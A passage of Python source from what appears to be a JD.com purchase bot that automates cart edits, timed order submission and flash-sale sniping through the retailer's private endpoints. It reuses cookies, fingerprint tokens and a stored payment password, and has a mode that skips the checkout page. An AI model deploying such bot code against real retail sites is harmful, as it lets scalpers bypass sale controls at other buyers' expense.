response_status(resp) def _change_item_num_in_cart(self, sku_id, vender_id, num, p_type, target_id, promo_id): """修改购物车商品的数量 修改购物车中商品数量后,该商品将会被自动勾选上。 :param sku_id: 商品id :param vender_id: 商家id :param num: 目标数量 :param p_type: 商品类型(可能) :param target_id: 参数用途未知,可能是用户判断优惠 :param promo_id: 参数用途未知,可能是用户判断优惠 :return: 商品数量修改结果 True/False """ url = "https://cart.jd.com/changeNum.action" data = { 't': 0, 'venderId': vender_id, 'pid': sku_id, 'pcount': num, 'ptype': p_type, 'targetId': target_id, 'promoID': promo_id, 'outSkus': '', 'random': random.random(), # 'locationId' } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://cart.jd.com/cart', } resp = self.sess.post(url, data=data, headers=headers) return json.loads(resp.text)['sortedWebCartResult']['achieveSevenState'] == 2 def _add_or_change_cart_item(self, cart, sku_id, count): """添加商品到购物车,或修改购物车中商品数量 如果购物车中存在该商品,会修改该商品的数量并勾选;否则,会添加该商品到购物车中并勾选。 :param cart: 购物车信息 dict :param sku_id: 商品id :param count: 商品数量 :return: 运行结果 True/False """ if sku_id in cart: logger.info('%s 已在购物车中,调整数量为 %s', sku_id, count) cart_item = cart.get(sku_id) return self._change_item_num_in_cart( sku_id=sku_id, vender_id=cart_item.get('vender_id'), num=count, p_type=cart_item.get('p_type'), target_id=cart_item.get('target_id'), promo_id=cart_item.get('promo_id') ) else: logger.info('%s 不在购物车中,开始加入购物车,数量 %s', sku_id, count) return self.add_item_to_cart(sku_ids={sku_id: count}) @check_login def get_checkout_page_detail(self): """获取订单结算页面信息 该方法会返回订单结算页面的详细信息:商品名称、价格、数量、库存状态等。 :return: 结算信息 dict """ get_checkout_page_request = self.request_info['get_checkout_page_request'] payload = { 'rid': str(int(time.time() * 1000)), } get_checkout_page_request(payload) def _save_invoice(self): """下单第三方商品时如果未设置发票,将从电子发票切换为普通发票 http://jos.jd.com/api/complexTemplate.htm?webPamer=invoice&groupName=%E5%BC%80%E6%99%AE%E5%8B%92%E5%85%A5%E9%A9%BB%E6%A8%A1%E5%BC%8FAPI&id=566&restName=jd.kepler.trade.submit&isMulti=true :return: """ url = 'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action' data = { "invoiceParam.selectedInvoiceType": 1, "invoiceParam.companyName": "个人", "invoiceParam.invoicePutType": 0, "invoiceParam.selectInvoiceTitle": 4, "invoiceParam.selectBookInvoiceContent": "", "invoiceParam.selectNormalInvoiceContent": 1, "invoiceParam.vatCompanyName": "", "invoiceParam.code": "", "invoiceParam.regAddr": "", "invoiceParam.regPhone": "", "invoiceParam.regBank": "", "invoiceParam.regBankAccount": "", "invoiceParam.hasCommon": "true", "invoiceParam.hasBook": "false", "invoiceParam.consigneeName": "", "invoiceParam.consigneePhone": "", "invoiceParam.consigneeAddress": "", "invoiceParam.consigneeProvince": "请选择:", "invoiceParam.consigneeProvinceId": "NaN", "invoiceParam.consigneeCity": "请选择", "invoiceParam.consigneeCityId": "NaN", "invoiceParam.consigneeCounty": "请选择", "invoiceParam.consigneeCountyId": "NaN", "invoiceParam.consigneeTown": "请选择", "invoiceParam.consigneeTownId": 0, "invoiceParam.sendSeparate": "false", "invoiceParam.usualInvoiceId": "", "invoiceParam.selectElectroTitle": 4, "invoiceParam.electroCompanyName": "undefined", "invoiceParam.electroInvoiceEmail": "", "invoiceParam.electroInvoicePhone": "", "invokeInvoiceBasicService": "true", "invoice_ceshi1": "", "invoiceParam.showInvoiceSeparate": "false", "invoiceParam.invoiceSeparateSwitch": 1, "invoiceParam.invoiceCode": "", "invoiceParam.saveInvoiceFlag": 1 } headers = { 'User-Agent': self.user_agent, 'Referer': 'https://trade.jd.com/shopping/dynamic/invoice/saveInvoice.action', } self.sess.post(url=url, data=data, headers=headers) @check_login def submit_order(self): """提交订单 重要: 1.该方法只适用于普通商品的提交订单(即可以加入购物车,然后结算提交订单的商品) 2.提交订单时,会对购物车中勾选✓的商品进行结算(如果勾选了多个商品,将会提交成一个订单) :return: True/False 订单提交结果 """ submit_order_request = self.request_info['submit_order_request'] return submit_order_request() @check_login def submit_order_with_retry(self, retry=3, interval=4): """提交订单,并且带有重试功能 :param retry: 重试次数 :param interval: 重试间隔 :return: 订单提交结果 True/False """ for i in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', i, retry) self.get_checkout_page_detail() if self.submit_order(): logger.info('第%s次提交订单成功', i) return True else: if i < retry: logger.info('第%s次提交失败,%ss后重试', i, interval) time.sleep(interval) else: logger.info('重试提交%s次结束', retry) return False @check_login def submit_order_by_time(self, buy_time, retry=4, interval=5): """定时提交商品订单 重要:该方法只适用于普通商品的提交订单,事先需要先将商品加入购物车并勾选✓。 :param buy_time: 下单时间,例如:'2018-09-28 22:45:50.000' :param retry: 下单重复执行次数,可选参数,默认4次 :param interval: 下单执行间隔,可选参数,默认5秒 :return: """ t = Timer(buy_time=buy_time) t.start() for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') @check_login def get_order_info(self, unpaid=True): """查询订单信息 :param unpaid: 只显示未付款订单,可选参数,默认为True :return: """ url = 'https://order.jd.com/center/list.action' payload = { 'search': 0, 'd': 1, 's': 4096, } # Orders for nearly three months headers = { 'User-Agent': self.user_agent, 'Referer': 'https://passport.jd.com/uc/login?ltype=logout', } try: resp = self.sess.get(url=url, params=payload, headers=headers) if not response_status(resp): logger.error('获取订单页信息失败') return soup = BeautifulSoup(resp.text, "html.parser") logger.info('************************订单列表页查询************************') order_table = soup.find('table', {'class': 'order-tb'}) table_bodies = order_table.select('tbody') exist_order = False for table_body in table_bodies: # get order status order_status = get_tag_value(table_body.select('span.order-status')).replace("订单状态:", "") # check if order is waiting for payment # wait_payment = bool(table_body.select('a.btn-pay')) wait_payment = "等待付款" in order_status # only show unpaid orders if unpaid=True if unpaid and (not wait_payment): continue exist_order = True # get order_time, order_id tr_th = table_body.select('tr.tr-th')[0] order_time = get_tag_value(tr_th.select('span.dealtime')) order_id = get_tag_value(tr_th.select('span.number a')) # get sum_price, pay_method sum_price = '' pay_method = '' amount_div = table_body.find('div', {'class': 'amount'}) if amount_div: spans = amount_div.select('span') pay_method = get_tag_value(spans, index=1) # if the order is waiting for payment, the price after the discount is shown. sum_price = get_tag_value(amount_div.select('strong'), index=1)[1:] if wait_payment \ else get_tag_value(spans, index=0)[4:] # get name and quantity of items in order items_dict = dict() # {'item_id_1': quantity_1, 'item_id_2': quantity_2, ...} tr_bds = table_body.select('tr.tr-bd') for tr_bd in tr_bds: item = tr_bd.find('div', {'class': 'goods-item'}) if not item: break item_id = item.get('class')[1][2:] quantity = get_tag_value(tr_bd.select('div.goods-number'))[1:] items_dict[item_id] = quantity order_info_format = '下单时间:{0}----订单号:{1}----商品列表:{2}----订单状态:{3}----总金额:{4}元----付款方式:{5}' logger.info(order_info_format.format(order_time, order_id, parse_items_dict(items_dict), order_status, sum_price, pay_method)) if not exist_order: logger.info('订单查询为空') except Exception as e: logger.error(e) @deprecated def _get_seckill_url(self, sku_id, server_buy_time=int(time.time())): """获取商品的抢购链接 点击"抢购"按钮后,会有两次302跳转,最后到达订单结算页面 这里返回第一次跳转后的页面url,作为商品的抢购链接 :param sku_id: 商品id :return: 商品的抢购链接 """ url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = global_config.retry_interval retry_count = 0 while retry_count < 10: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 logger.info("第%s次获取抢购链接失败,%s不是抢购商品或抢购页面暂未刷新,%s秒后重试", retry_count, sku_id, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) def request_seckill_url(self, sku_id, server_buy_time): """访问商品的抢购链接(用于设置cookie等) :param sku_id: 商品id :return: """ if not self.seckill_url.get(sku_id): seckill_url = self.request_info['get_sku_seckill_url_request'](sku_id, server_buy_time) if seckill_url is not None: self.seckill_url[sku_id] = seckill_url else: return None return self.request_info['request_sku_seckill_url_request'](sku_id) @deprecated def request_seckill_checkout_page(self, sku_id, num=1): """访问抢购订单结算页面 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: """ url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) def _get_seckill_init_info(self, sku_id, num=1): """获取秒杀初始化信息(包括:地址,发票,token) :param sku_id: :param num: 购买数量,可选参数,默认1个 :return: 初始化信息组成的dict """ count = 1 while count < 8: logger.info('第 %s 次获取秒杀初始化信息', count) content = self.request_info['get_seckill_init_info_request'](sku_id, num) try: if 'koFail' in content: logger.error('抢购失败,请求重定向,地址:%s', content) else: return parse_json(content) except Exception as e: logger.error('获取秒杀初始化信息失败,响应数据:%s,异常:%s', content, e) count += 1 def _gen_seckill_order_data(self, sku_id, num=1): """生成提交抢购订单所需的请求体参数 :param sku_id: 商品id :param num: 购买数量,可选参数,默认1个 :return: 请求体参数组成的dict """ # 获取用户秒杀初始化信息 init_info = self.seckill_init_info.get(sku_id) if not init_info: init_info = self._get_seckill_init_info(sku_id) self.seckill_init_info[sku_id] = init_info default_address = init_info['addressList'][0] # 默认地址dict invoice_info = init_info.get('invoiceInfo', {}) # 默认发票信息dict, 有可能不返回 token = init_info['token'] data = { 'skuId': sku_id, 'num': num, 'addressId': default_address['id'], 'yuShou': str(bool(int(init_info['seckillSkuVO']['extMap'].get('YuShou', '0')))).lower(), 'isModifyAddress': 'false', 'name': default_address['name'], 'provinceId': default_address['provinceId'], 'cityId': default_address['cityId'], 'countyId': default_address['countyId'], 'townId': default_address['townId'], 'addressDetail': default_address['addressDetail'], 'mobile': default_address['mobile'], 'mobileKey': default_address['mobileKey'], 'email': default_address.get('email', ''), 'postCode': '', 'invoiceTitle': invoice_info.get('invoiceTitle', -1), 'invoiceCompanyName': '', 'invoiceContent': invoice_info.get('invoiceContentType', 1), 'invoiceTaxpayerNO': '', 'invoiceEmail': '', 'invoicePhone': invoice_info.get('invoicePhone', ''), 'invoicePhoneKey': invoice_info.get('invoicePhoneKey', ''), 'invoice': 'true' if invoice_info else 'false', 'password': global_config.get('account', 'payment_pwd'), 'codTimeType': 3, 'paymentType': 4, 'areaCode': '', 'overseas': 0, 'phone': '', 'eid': self.eid, 'fp': self.fp, 'token': token, 'pru': '' } return data def exec_seckill(self, sku_id, server_buy_time=int(time.time()), retry=4, interval=4, num=1, fast_mode=True): """立即抢购 抢购商品的下单流程与普通商品不同,不支持加入购物车,可能需要提前预约,主要执行流程如下: 1. 访问商品的抢购链接 2. 访问抢购订单结算页面(好像可以省略这步,待测试) 3. 提交抢购(秒杀)订单 :param sku_id: 商品id :param server_buy_time: 商品指定抢购时间 :param retry: 抢购重复执行次数,可选参数,默认4次 :param interval: 抢购执行间隔,可选参数,默认4秒 :param num: 购买数量,可选参数,默认1个 :param fast_mode: 快速模式:略过访问抢购订单结算页面这一步骤,默认为 True :return: 抢购结果 True/False """ for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试抢购商品:%s', count, retry, sku_id) if not fast_mode: # 访问抢购订单结算页面 self.request_info['request_seckill_checkout_page_request'](sku_id, num) if self.request_info['submit_seckill_order_request'](sku_id, server_buy_time, num): return True else: logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,抢购%s失败!', sku_id) return False @check_login def exec_seckill_by_time(self, config): """预约抢购 """ if not config: raise AsstException('初始化配置为空!') self.config = config # 兼容正常流程:开抢前清空购物车 self.clear_cart() items_dict = parse_sku_id(sku_ids=config.sku_id) if self.use_new: server_buy_time, realy_buy_time = self.new_init_seckill_request_method(config.fast_mode, config.is_risk_control) else: # 1.提前初始化预约抢购流程请求信息、方法 server_buy_time, realy_buy_time = self.init_seckill_request_method(config.fast_mode, config.is_risk_control) # 兼容正常流程:初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) Timer.setSystemTime() # 使用多线程需要从倒计时前开始,后续流程都使用多线程执行 if self.use_new: get_confirm_order_page_request = self.request_info['get_confirm_order_page_request'] submit_order_request = self.request_info['submit_order_request'] def start_func(): # 订单请求页面 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) submit_data = get_confirm_order_page_request(sku_id, server_buy_time) if submit_data is not None: retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: # 下单请求 if submit_order_request(submit_data, count): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue else: return None else: def start_func(): # 使用协程/多线程从执行开始 # 3.执行 for sku_id in items_dict: logger.info('开始抢购商品:%s', sku_id) # 获取抢购链接 resp = self.request_seckill_url(sku_id, server_buy_time) if resp is not None: if resp == 'pass': pass elif resp.status == 302: location = resp.headers['location'] logger.info('访问商品抢购链接请求,重定向地址:%s', location) if 'gate.action' in location: # 此处转入正常购物车下单流程 add_cart_request = self.request_info['add_cart_request'] payload = { 'pid': sku_id, 'pcount': config.num, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) with self.sem: if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') continue # 开始抢购 self.exec_seckill(sku_id, server_buy_time, config.retry, config.interval, int(items_dict[sku_id]), config.fast_mode) self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品:%s', list(items_dict.keys())) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() def new_parse_item_detail_page(self, sku_id, html): match = re.search(r'"zzz":\"(.*)\"', html) if not match: return False zzz = match.group(1) if zzz is None: return False self.item_zzz[sku_id] = zzz area_id_list = list(map(lambda x: x.strip(), re.split('_|-', self.area_id))) area_url = '' if len(area_id_list) > 2: area_url = area_id_list[0] + '-' + area_id_list[1] + '-' + area_id_list[2] item_url_param = 'sceneval=2&bid=&scene=jd&isCanEdit=1&EncryptInfo=&Token=&type=0&lg=0&supm=0&locationid=' + area_url + '&favorablerate=94' self.item_url_param[sku_id] = item_url_param return True def parse_item_detail_page(self, sku_id, page): match = re.search(r'cat: \[(.*?)\]', page.text) cat = match.group(1) if not cat: return False self.item_cat[sku_id] = cat match = re.search(r'venderId:(\d*?),', page.text) vender_id = match.group(1) self.item_vender_ids[sku_id] = vender_id match = re.search(r'paramJson:( ?)\'(\{.*\})\'', page.text) param_json = match.group(1) if not param_json or param_json == '' or param_json == ' ': param_json = match.group(2) if not param_json: param_json = '' self.param_json[sku_id] = param_json match = re.search(r'specialAttrs:( ?)(\[.*\])', page.text) special_attrs_str = match.group(1) if not special_attrs_str or special_attrs_str == '' or special_attrs_str == ' ': special_attrs_str = match.group(2) if special_attrs_str: special_attrs = json.loads(special_attrs_str) else: special_attrs = [] self.special_attrs[sku_id] = special_attrs return True def new_init_yuyue_buy_time(self, sku_id=None, html=None): config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动获取 match = re.search(r'"yuyue":({.*})', html) if match: yuyue = match.group(1) if yuyue: yuyue_json = parse_json(yuyue) buy_start_time = yuyue_json['qiangStime'] if buy_start_time: buy_end_time = yuyue_json['qiangEtime'] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M:%S") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: logger.debug(f"响应数据:{html}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_yuyue_buy_time(self, sku_id=None, header=None, payload=None): if header is None: header = dict() config = self.config logger.info('初始化预约抢购时间') # 处理时间 server_buy_datetime = None if config.sku_buy_time: # 根据配置初始化 server_buy_datetime = datetime.strptime(config.sku_buy_time, "%Y-%m-%d %H:%M:%S.%f") else: # 自动初始化 header['Host'] = 'itemko.jd.com' header['Referer'] = 'https://item.jd.com/' resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', method='GET', headers=header, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: buy_time = yuyue_info.get('buyTime') if buy_time: buy_time_list = re.findall(r'\d{4}-\d{1,2}-\d{1,2} \d{1,2}:\d{1,2}', buy_time.strip()) if buy_time_list and len(buy_time_list) == 2: buy_start_time = buy_time_list[0] buy_end_time = buy_time_list[1] server_buy_datetime = datetime.strptime(buy_start_time, "%Y-%m-%d %H:%M") logger.info('商品%s预约抢购,开始时间:%s,结束时间:%s', sku_id, buy_start_time, buy_end_time) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s无法获取预约抢购时间,请重新设置sku_id", sku_id) exit(-1) else: logger.info("商品%s不是 预约抢购商品 或 未开始预约,请重新设置sku_id", sku_id) exit(-1) return int(time.mktime(server_buy_datetime.timetuple())), ( server_buy_datetime + timedelta(milliseconds=-config.buy_time_offset)).strftime( "%Y-%m-%d %H:%M:%S.%f") def init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 初始化获取商品抢购链接请求方法 get_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: get_sku_seckill_url_request_headers['Host'] = 'itemko.jd.com' if 'isKO' in special_attrs: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } get_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://itemko.jd.com/itemShowBtn', method='GET', headers=get_sku_seckill_url_request_headers, params=payload , cookies=self.get_cookies_str_by_domain_or_path( 'itemko.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): logger.info('获取抢购链接') payload = { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, } get_sku_seckill_url_request_headers['Referer'] = 'https://item.jd.com/' retry_interval = config.retry_interval retry_count = 0 while not self.seckill_url.get(sku_id): if retry_count >= 10: logger.error("抢购链接获取失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url='https://item-soa.jd.com/getWareBusiness', method='GET', headers=get_sku_seckill_url_request_headers, params=payload, cookies=self.get_cookies_str_by_domain_or_path( 'item-soa.jd.com')) resp_data = resp.body resp_json = parse_json(resp_data) yuyue_info = resp_json.get('yuyueInfo') if yuyue_info: # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc url = yuyue_info.get('url') if url: if 'toYuyue.action' in url: retry_count += 1 logger.info("商品%s正在预约中,暂未开始抢购,开始第%s次重试", sku_id, retry_count) continue router_url = 'https:' + url # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s第%s次获取抢购链接失败,链接为空,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) else: if resp_data: logger.info(f"响应数据:{resp_data}") logger.info("商品%s不是 预约抢购商品 或 未开始预约,本次抢购结束", sku_id) exit(-1) except Exception as e: retry_count += 1 logger.error("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) return None else: def get_sku_seckill_url_request(sku_id, server_buy_time=int(time.time())): url = 'https://itemko.jd.com/itemShowBtn' payload = { 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'from': 'pc', '_': str(server_buy_time * 1000), } headers = { 'User-Agent': self.user_agent, 'Host': 'itemko.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } retry_interval = 0.2 retry_count = 0 while retry_count < 10: try: resp = self.sess.get(url=url, headers=headers, params=payload, timeout=(0.1, 0.08)) resp_json = parse_json(resp.text) if resp_json.get('url'): # https://divide.jd.com/user_routing?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc router_url = 'https:' + resp_json.get('url') # https://marathon.jd.com/captcha.html?skuId=8654289&sn=c3f4ececd8461f0e4d7267e96a91e0e0&from=pc seckill_url = router_url.replace('divide', 'marathon').replace('user_routing', 'captcha.html') logger.info("抢购链接获取成功: %s", seckill_url) return seckill_url else: retry_count += 1 if resp.text: logger.info(f"响应数据:{resp.text}") logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) except Exception as e: retry_count += 1 logger.info("异常信息:%s", e) logger.info("商品%s第%s次获取抢购链接失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) logger.error("抢购链接获取失败,终止抢购!") exit(-1) self.request_info['get_sku_seckill_url_request'] = get_sku_seckill_url_request # 初始化访问商品抢购链接请求方法(用于设置cookie等) request_sku_seckill_url_request_headers = self.headers.copy() if fast_mode: request_sku_seckill_url_request_headers['Host'] = 'marathon.jd.com' def request_sku_seckill_url_request(sku_id): logger.info('访问商品抢购链接请求') request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' url = self.seckill_url.get(sku_id) is_pass = self.is_request_seckill_url.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=request_sku_seckill_url_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_request_seckill_url[sku_id] = 'pass' return resp else: return is_pass else: def request_sku_seckill_url_request(sku_id): headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } return self.sess.get(url=self.seckill_url.get(sku_id), headers=headers, allow_redirects=False, timeout=(0.1, 0.08)) self.request_info['request_sku_seckill_url_request'] = request_sku_seckill_url_request # 初始化访问抢购订单结算页面请求方法 request_seckill_checkout_page_request_headers = self.headers.copy() # if fast_mode and is_risk_control is False: if fast_mode: # request_seckill_checkout_page_request_headers['cookie'] = self.cookies_str request_seckill_checkout_page_request_headers['Host'] = 'marathon.jd.com' def request_seckill_checkout_page_request(sku_id, num): logger.info('抢购订单结算页面请求') url = 'https://marathon.jd.com/seckill/seckill.action' request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' is_pass = self.is_seckill_checkout_page.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', params={ 'skuId': sku_id, 'num': num, 'rid': int(time.time()) }, headers=request_seckill_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_seckill_checkout_page[sku_id] = True return resp else: return is_pass else: def request_seckill_checkout_page_request(sku_id, num): url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) self.request_info['request_seckill_checkout_page_request'] = request_seckill_checkout_page_request # 初始化获取秒杀初始化信息请求方法(包括:地址,发票,token) get_seckill_init_info_request_headers = self.headers.copy() if fast_mode: # get_seckill_init_info_request_headers['cookie'] = self.cookies_str get_seckill_init_info_request_headers['Host'] = 'marathon.jd.com' def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' resp = http_util.send_http_request(self.socket_client, url=url, method='POST', data={ 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', }, headers=get_seckill_init_info_request_headers, cookies=self.get_cookies_str_by_domain_or_path('marathon.jd.com')) # logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) if resp.status == 302: return resp.headers['location'] # self.get_and_update_cookies_str() return resp.body else: def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' data = { 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', } return self.sess.post(url=url, data=data, headers=headers).text self.request_info['get_seckill_init_info_request'] = get_seckill_init_info_request # 初始化提交抢购(秒杀)订单请求方法 submit_seckill_order_request_headers = self.headers.copy() if fast_mode: # submit_seckill_order_request_headers['cookie'] = cookie_str submit_seckill_order_request_headers['Host'] = 'marathon.jd.com' def submit_seckill_order_request(sku_id=None, server_buy_time=int(time.time()), num=1): logger.info('提交抢购(秒杀)订单请求') url = 'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' submit_seckill_order_request_headers[ 'Referer'] = f'https://marathon.jd.com/seckill/seckill.action?skuId={sku_id}&num={num}&rid={server_buy_time} ' if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = http_util.send_http_request(self.socket_client, url=url, method='POST', params={'skuId': sku_id}, data=self.seckill_order_data.get(sku_id), headers=submit_seckill_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) body = resp.body logger.info(body) resp_json = parse_json(body) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': 